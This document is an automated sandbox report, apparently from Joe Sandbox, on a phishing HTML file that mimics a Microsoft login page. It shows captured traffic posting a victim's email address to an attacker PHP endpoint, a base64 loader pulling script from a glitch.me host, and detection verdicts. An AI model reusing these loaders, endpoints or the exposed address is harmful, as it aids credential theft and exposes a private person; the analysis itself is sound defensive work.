13	192.168.2.4	49767	185.244.151.84	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:22 UTC	594	OUT	POST /wp-ad/c188fdc.php HTTP/1.1 Host: abbalandscape.info Connection: keep-alive Content-Length: 37 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:22 UTC	37	OUT	Data Raw: 65 6d 3d 74 72 61 63 79 2e 64 75 72 72 61 6e 63 65 25 34 30 6d 61 69 6e 73 74 72 65 65 74 63 62 66 2e 63 6f 6d Data Ascii: em=tracy.durrance%40mainstreetcbf.com
2024-07-03 19:20:23 UTC	674	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.2.34 set-cookie: PHPSESSID=6c7fe3cf27b3bdf3a75670e803f88b85; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-credentials: true access-control-allow-methods: GET, PUT, POST, DELETE, OPTIONS content-type: text/html; charset=UTF-8 content-length: 0 date: Wed, 03 Jul 2024 19:20:23 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	185.244.151.84	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:24 UTC	359	OUT	GET /wp-ad/c188fdc.php HTTP/1.1 Host: abbalandscape.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:25 UTC	674	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.2.34 set-cookie: PHPSESSID=799adb9add4c99ae98bc8ef1f2230e90; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-credentials: true access-control-allow-methods: GET, PUT, POST, DELETE, OPTIONS content-type: text/html; charset=UTF-8 content-length: 0 date: Wed, 03 Jul 2024 19:20:24 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	185.244.151.84	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:39 UTC	594	OUT	POST /wp-ad/c188fdc.php HTTP/1.1 Host: abbalandscape.info Connection: keep-alive Content-Length: 37 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:39 UTC	37	OUT	Data Raw: 65 6d 3d 74 72 61 63 79 2e 64 75 72 72 61 6e 63 65 25 34 30 6d 61 69 6e 73 74 72 65 65 74 63 62 66 2e 63 6f 6d Data Ascii: em=tracy.durrance%40mainstreetcbf.com
2024-07-03 19:20:41 UTC	674	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.2.34 set-cookie: PHPSESSID=b8b9a536feeec70f19d7426a59448945; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-credentials: true access-control-allow-methods: GET, PUT, POST, DELETE, OPTIONS content-type: text/html; charset=UTF-8 content-length: 0 date: Wed, 03 Jul 2024 19:20:40 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49770	185.244.151.84	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:41 UTC	411	OUT	GET /wp-ad/c188fdc.php HTTP/1.1 Host: abbalandscape.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=799adb9add4c99ae98bc8ef1f2230e90
2024-07-03 19:20:42 UTC	602	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.2.34 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-credentials: true access-control-allow-methods: GET, PUT, POST, DELETE, OPTIONS content-type: text/html; charset=UTF-8 content-length: 0 date: Wed, 03 Jul 2024 19:20:42 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49771	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:51 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-03 19:20:51 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: c71692a1-03d2-4bbc-a735-66b1d42621f4 MS-RequestId: 165f0a0a-e7ef-4f8c-85d3-59df89a6a759 MS-CV: Ct2SkWr+wEOuVOp8.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 03 Jul 2024 19:20:50 GMT Connection: close Content-Length: 30005
2024-07-03 19:20:51 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-07-03 19:20:51 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	15:19:52
Start date:	03/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\RemittanceCopy389.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	15:19:57
Start date:	03/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1948,i,4964140377372381568,1844792585278010681,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html' is a local file path, which is highly suspicious and not typical for legitimate websites. The page mimics a Microsoft login page, which is a common target for phishing attacks. The email domain 'mainstreetcbf.com' does not match the legitimate Microsoft domain. The presence of a prominent login form and the use of social engineering techniques to mimic a legitimate brand further indicate that this is a phishing attempt. DOM: 0.0.pages.csv
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	LLM: Score: 9 brands: Microsoft Reasons: The URL 'file:///C:/Users/user/Desktop/RemittanceCopy389.html#' is a local file path, which is highly suspicious for a legitimate login page. Legitimate Microsoft login pages would be hosted on the 'microsoft.com' domain. The image shows a login form that closely resembles Microsoft's login page, which is a common social engineering technique used in phishing attacks. Additionally, the presence of a prominent login form and a suspicious link ('Can't access your account?') further indicate phishing. Therefore, this site is highly likely to be a phishing site. DOM: 1.1.pages.csv

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	Matcher: Template: microsoft matched with high similarity
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	Matcher: Template: microsoft matched with high similarity

Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: New script, src: data:/html;base64,ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcm91bmRlZC1zY3JlZWNoaW5nLXNjcmlwdC5nbGl0Y2gubWUvZGF0cy5qcyI+PC9zY3JpcHQ+Jyk7
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: New script, src: data:/html;base64,ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcm91bmRlZC1zY3JlZWNoaW5nLXNjcmlwdC5nbGl0Y2gubWUvZGF0cy5qcyI+PC9zY3JpcHQ+Jyk7

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	Tab title: Sign in to Best Productivity Provider!
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	Tab title: Sign in to Best Productivity Provider!

Source: RemittanceCopy389.html	HTTP Parser: Base64 decoded: document.write
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: Base64 decoded: document.write
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: Base64 decoded: document.write

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	Matcher: Template: microsoft matched
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	Matcher: Template: microsoft matched

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: Total embedded image size: 31111
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: Total embedded image size: 31111

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: Invalid link: Forgot my password
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: Invalid link: Forgot my password

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/RemittanceCopy389.html#	HTTP Parser: No <meta name="copyright".. found

Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 13.107.246.44 13.107.246.44
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.24
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26

Source: global traffic	HTTP traffic detected: GET /dats.js HTTP/1.1Host: rounded-screeching-script.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /set.js HTTP/1.1Host: rounded-screeching-script.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-ad/c188fdc.php HTTP/1.1Host: abbalandscape.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=799adb9add4c99ae98bc8ef1f2230e90
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: rounded-screeching-script.glitch.me
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: abbalandscape.info

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

